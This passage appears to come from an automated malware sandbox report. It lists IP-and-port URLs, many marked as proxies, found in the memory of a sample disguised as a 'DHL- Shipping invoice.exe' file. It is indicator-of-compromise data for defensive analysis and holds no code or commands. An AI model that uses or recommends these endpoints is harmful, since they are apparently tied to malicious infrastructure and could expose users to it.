                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32588://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32896
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32896://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:39803
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:48962
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:48962://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:49042
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:49042://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:51513
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:51513://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:53012
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:53012://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.147.235.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.147.235.99:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.147.235.99:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.127.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.127.162:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.127.162:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.233.54:8081
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.233.54:8081://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.77.58:56921
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.77.58:56921://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.84.228:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.84.228:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.55.39:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.55.39:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.186:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.190:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.190:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.190:3128p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.203.242.66:222
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.203.242.66:222://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.205.197.226:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.205.197.226:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.249.200
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.249.200://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.249.200:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.214.31.234:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.214.31.234:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.227.66.139:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.227.66.139:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.231.186.133:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.231.186.133:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.241.217.58:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.241.217.58:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:43044
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:43044://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:54467
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:54467://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:7785
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:7785://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:10824
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:10824://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A6D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:34780
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:22942
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:22942://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:58604
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:58604://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:8623://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:53035
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:53035://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:15430
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:15430://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:26570://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:53903
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:53903://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:60314://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:64422
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:64422://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.194:40631
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.194:40631://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.47:17158
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.47:17158://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.47:36637
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.28.245:8560
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.28.245:8560://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.60.110:23293://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:36073
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:36073://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:50903
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.241.92.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.241.92.218:14888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.241.92.218:14888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.242.212.50:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.242.212.50:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.139:9510
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.139:9510://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:58749
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:58749://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:61778
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:61778://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.51.78.66:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.51.78.66:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98065D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.220.229:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.220.229:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.100:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.100:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.100.18.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.100.18.111:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.100.18.111:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.203.7:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.203.7:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.31.136:2114
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.177.106.178:2324
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.177.106.178:2324://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:55806
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:55806://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.199.226:1971
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.199.226:1971://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.232.11.178:58028://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.26.241.120:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.26.241.120:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.43.164.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.43.164.242:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.43.164.242:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.152.86:48256
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.152.86:48256://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815C8000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.74.60:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.74.60:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.70.195.145:8080
